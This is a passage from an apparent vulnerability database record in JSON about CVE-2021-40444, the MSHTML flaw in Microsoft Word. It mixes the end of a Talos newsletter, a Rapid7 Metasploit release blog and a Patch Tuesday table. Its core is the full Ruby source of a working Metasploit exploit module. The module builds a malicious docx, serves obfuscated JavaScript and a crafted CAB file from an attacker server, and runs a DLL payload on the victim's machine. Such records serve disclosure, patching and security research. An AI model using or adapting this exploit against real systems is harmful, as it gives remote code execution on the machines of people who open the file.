turn down law enforcement requests for data. ([Insider](<https://www.businessinsider.com/police-getting-help-social-media-to-prosecute-people-seeking-abortions-2023-2?ref=blog.talosintelligence.com>), [Mashable](<https://mashable.com/article/police-using-facebook-google-user-data?ref=blog.talosintelligence.com>))\n\nAfter the one-year anniversary of Russia's invasion of Ukraine, experts are looking at how **this has become one of the world's first hybrid wars**, including Russia's many cyber weapons its deployed against Ukraine over the past year. Other countries who feel they may be vulnerable to large-scale cyber attacks from nation-states (such as Taiwan against China) can learn quite a bit from how Ukraine has responded so far to Russian attacks. A new deep-dive report also outlines how crucial a cyber attack against the Viasat satellite network helped Russia prepare for its ground invasion just a few days prior. ([NPR](<https://www.npr.org/2023/03/02/1160714527/the-role-of-cyber-weapons-in-russias-war-on-ukraine?ref=blog.talosintelligence.com>), [Bloomberg](<https://www.bloomberg.com/features/2023-russia-viasat-hack-ukraine/?leadSource=uverify+wall&ref=blog.talosintelligence.com>))\n\nPassword management company **LastPass said attackers accessed a decrypted vault available to only a handful of company developers by hacking an employee's home computer** in August. The new details add on to a data breach the company first disclosed several months ago. LastPass said an unknown threat actor stole valid login credentials from a senior DevOps engineer and accessed the contents of a LastPass data vault. That vault contained access to a shared cloud storage environment that included encryption keys for customers' vault backups stored on Amazon S3 buckets. The attackers reportedly exploited a flaw in Plex, a media-sharing software, to access the user's home device in the first place. Plex disclosed its own data breach in late August. ([Ars Technica](<https://arstechnica.com/information-technology/2023/02/lastpass-hackers-infected-employees-home-computer-and-stole-corporate-vault/?ref=blog.talosintelligence.com>), [Wired](<https://www.wired.com/story/lastpass-engineer-breach-security-roundup/?ref=blog.talosintelligence.com>))\n\n## Can't get enough Talos?\n\n * [Threat Roundup for Feb. 24 - March 3](<https://blog.talosintelligence.com/threat-roundup-feb-24-march-3-2023/>)\n * [Talos Takes Ep. #129: The benefits of taking an active approach to threat defense](<https://www.buzzsprout.com/2018149/episodes/12367602?ref=blog.talosintelligence.com>)\n * [The role of cyber weapons in Russia's war on Ukraine](<https://www.kalw.org/2023-03-02/the-role-of-cyber-weapons-in-russias-war-on-u?ref=blog.talosintelligence.com>)\n\n## Upcoming events where you can find Talos\n\n**[WiCyS](<https://www.wicys.org/events/wicys-2023/?ref=blog.talosintelligence.com>) (March 16 - 18)**\n\nDenver, CO\n\n**[RSA](<https://www.rsaconference.com/usa?ref=blog.talosintelligence.com>) (April 24 - 27)**\n\nSan Francisco, CA\n\n## Most prevalent malware files from Talos telemetry over the past week\n\n \n**SHA 256:** [e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details?ref=blog.talosintelligence.com>) \n**MD5:** 93fefc3e88ffb78abb36365fa5cf857c \n**Typical Filename:** Wextract \n**Claimed Product:** Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg\n\n**SHA 256:** [00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725](<https://www.virustotal.com/gui/file/00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725/details?ref=blog.talosintelligence.com>) \n**MD5:** d47fa115154927113b05bd3c8a308201 \n**Typical Filename:** mssqlsrv.exe \n**Claimed Product:** N/A \n**Detection Name:** Trojan.GenericKD.65065311\n\n**SHA 256:** [de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423](<https://www.virustotal.com/gui/file/de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423/details?ref=blog.talosintelligence.com>) \n**MD5:** 954a5fc664c23a7a97e09850accdfe8e \n**Typical Filename:** teams15.exe \n**Claimed Product:** teams15 \n**Detection Name:** Gen:Variant.MSILHeracles.59885\n\n**SHA 256:** [9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507](<https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details?ref=blog.talosintelligence.com>) \n**MD5: **2915b3f8b703eb744fc54c81f4a9c67f \n**Typical Filename:** VID001.exe \n**Claimed Product:** N/A \n**Detection Name:** Win.Worm.Coinminer::1201\n\n**SHA 256:** [e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details?ref=blog.talosintelligence.com>) \n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n**Typical Filename:** AAct.exe \n**Claimed Product:** N/A \n**Detection Name:** PUA.Win.Tool.Kmsauto::1201", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-03-09T19:00:12", "type": "talosblog", "title": "Threat Source newsletter (March 9, 2023) \u2014 Stop freaking out about ChatGPT", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-03-09T19:00:12", "id": "TALOSBLOG:446DF38AD4792F3CF775EEF8182E9A9B", "href": "https://blog.talosintelligence.com/threat-source-newsletter-march-9-2023-stop-freaking-out-about-chatgpt/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-05-25T08:45:40", "description": "This Metasploit module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "zdt", "title": "Microsoft Office Word MSHTML Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-09T00:00:00", "id": "1337DAY-ID-37126", "href": "https://0day.today/exploit/description/37126", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/37126", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-12-10T23:03:49", "description": "## Word and Javascript are a rare duo.\n\n\n\nThanks to [thesunRider](<https://github.com/thesunRider>). you too can experience the wonder of this mystical duo. The sole new metasploit module this release adds a file format attack to generate a very special document. By utilizing Javascript embedded in a Word document to trigger a chain of events that slip through various Windows facilities, a session as the user who opened the document can be yours.\n\n## Do you like spiders?\n\nIt has been 3 years since SMB2 support was added to smb share enumeration and over a year ago SMB3 support was added, yet the spiders are not done spinning their webs. Thanks to [sjanusz-r7](<https://github.com/sjanusz-r7>) the spiders have evolved to take advantage of these new skills and the webs can span new doorways. Updates to `scanner/smb/smb_enumshares` improve enumeration support for the latest Windows targets that deploy with SMB3 only by default.\n\n## New module content (1)\n\n * [Microsoft Office Word Malicious MSHTML RCE](<https://github.com/rapid7/metasploit-framework/pull/15742>) by [klezVirus](<https://github.com/klezVirus>), [lockedbyte](<https://github.com/lockedbyte>), [mekhalleh (RAMELLA S\u00e9bastien)](<https://github.com/mekhalleh>), and [thesunRider](<https://github.com/thesunRider>), which exploits [CVE-2021-40444](<https://attackerkb.com/topics/6ojqzQoPox/cve-2021-40444?referrer=blog>) \\- This adds an exploit for CVE-2021-40444 which is a vulnerability that affects Microsoft Word. Successful exploitation results in code execution in the context of the user running Microsoft Word.\n\n## Enhancements and features\n\n * [#15854](<https://github.com/rapid7/metasploit-framework/pull/15854>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This updates the `SpiderProfiles` option as part of the `scanner/smb/smb_enumshares` module to now work against newer SMB3 targets, such as windows 10, Windows Server 2016, and above.\n * [#15888](<https://github.com/rapid7/metasploit-framework/pull/15888>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This adds anonymised database statistics to msfconsole's `debug` command, which is used to help developers track down database issues as part of user generated error reports.\n * [#15929](<https://github.com/rapid7/metasploit-framework/pull/15929>) from [bcoles](<https://github.com/bcoles>) \\- This adds nine new Windows 2003 SP2 targets that the `exploit/windows/smb/ms08_067_netapi` module can exploit.\n\n## Bugs fixed\n\n * [#15808](<https://github.com/rapid7/metasploit-framework/pull/15808>) from [timwr](<https://github.com/timwr>) \\- This fixes a compatibility issue with Powershell `read_file` on Windows Server 2012 by using the old style Powershell syntax (New-Object).\n * [#15937](<https://github.com/rapid7/metasploit-framework/pull/15937>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This removes usage of `SortedSet` to improve support for Ruby 3.\n * [#15939](<https://github.com/rapid7/metasploit-framework/pull/15939>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where the Meterpreter dir/ls function would show the creation date instead of the modified date for the directory contents.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.17...6.1.19](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-12-02T11%3A01%3A28-06%3A00..2021-12-09T08%3A35%3A23%2B00%3A00%22>)\n * [Full diff 6.1.17...6.1.19](<https://github.com/rapid7/metasploit-framework/compare/6.1.17...6.1.19>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-10T21:36:13", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-10T21:36:13", "id": "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "href": "https://blog.rapid7.com/2021/12/10/metasploit-wrap-up-142/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-26T09:00:50", "description": "\n\nMicrosoft has fixed a total of 60 vulnerabilities this month, including two publicly disclosed 0-days. Fortunately there are only a few issues rated critical this month with the vast majority of the remainder being rated important. Here\u2019s three big things you can go patch right now.\n\n### MSHTML Remote Code Execution 0-day ([CVE-2021-40444](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444>))\n\nThe hot topic this month is the most recent remote code execution 0-day vulnerability in MSHTML. When it was first discovered it was only being used in a limited number of attacks, however this quickly changed once instructions for exploiting the vulnerability were published online. This vulnerability was severe enough to warrant publishing patches for older operating systems including Windows 7, Windows Server 2008 R2, and Windows Server 2008. Now that updates have been published for this vulnerability they should be applied as soon as possible.\n\n### Windows DNS Local Elevation of Privilege ([CVE-2021-36968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968>))\n\nThis is the second publicly disclosed vulnerability updated this month. While the details surrounding this CVE are sparse, we do know that Microsoft has not detected exploitation in the wild. \n\n### Updates to PrintNightmare ([CVE-2021-1678](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1678>))\n\nMicrosoft has made additional patches available for older operating systems. If you were previously unable to patch against this vulnerability you may want to review this new information.\n\n## Summary Graphs\n\n\n\n## Summary Tables\n\n## Azure Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-38647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38647>) | Open Management Infrastructure Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2021-38645](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38645>) | Open Management Infrastructure Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38648>) | Open Management Infrastructure Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-38649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38649>) | Open Management Infrastructure Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2021-40448](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40448>) | Microsoft Accessibility Insights for Android Information Disclosure Vulnerability | No | No | 6.3 | Yes \n[CVE-2021-36956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36956>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Title | Exploited | Disclosed | CVSS3 | FAQ \n---|---|---|---|---|--- \n[CVE-2021-38642](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38642>) | Microsoft Edge for iOS Spoofing Vulnerability | No | No | 6.1 | No \n[CVE-2021-38641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38641>) | Microsoft Edge for Android Spoofing Vulnerability | No | No | 6.1 | No \n[CVE-2021-26439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26439>) | Microsoft Edge for Android Information Disclosure Vulnerability | No | No | 4.6 | No \n[CVE-2021-38669](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38669>) | Microsoft Edge (Chromium-based) Tampering Vulnerability | No | No | 6.4 | Yes \n[CVE-2021-26436](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26436>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 6.1 | No \n[CVE-2021-36930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36930>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 5.3 | No \n[CVE-2021-30632](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30632>) | Chromium: CVE-2021-30632 Out of bounds write in V8 | No | No | | Yes \n[CVE-2021-30624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30624>) | Chromium: CVE-2021-30624 Use after free in Autofill | No | No | | Yes \n[CVE-2021-30623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30623>) | Chromium: CVE-2021-30623 Use after free in Bookmarks | No | No | | Yes \n[CVE-2021-30622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30622>) | Chromium: CVE-2021-30622 Use after free in WebApp Installs | No | No | | Yes \n[CVE-2021-30621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30621>) | Chromium: CVE-2021-30621 UI Spoofing in Autofill | No | No | | Yes \n[CVE-2021-30620](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30620>) | Chromium: CVE-2021-30620 Insufficient policy enforcement in Blink | No | No | | Yes \n[CVE-2021-30619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30619>) | Chromium: CVE-2021-30619 UI Spoofing in Autofill | No | No | | Yes \n[CVE-2021-30618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30618>) | Chromium: CVE-2021-30618 Inappropriate implementation in DevTools | No | No | | Yes \n[CVE-2021-30617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30617>) | Chromium: CVE-2021-30617 Policy bypass in Blink | No | No | | Yes \n[CVE-2021-30616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-30616>) | Chromium: CVE-2021-30616 Use after free in Media | No | No | | Yes 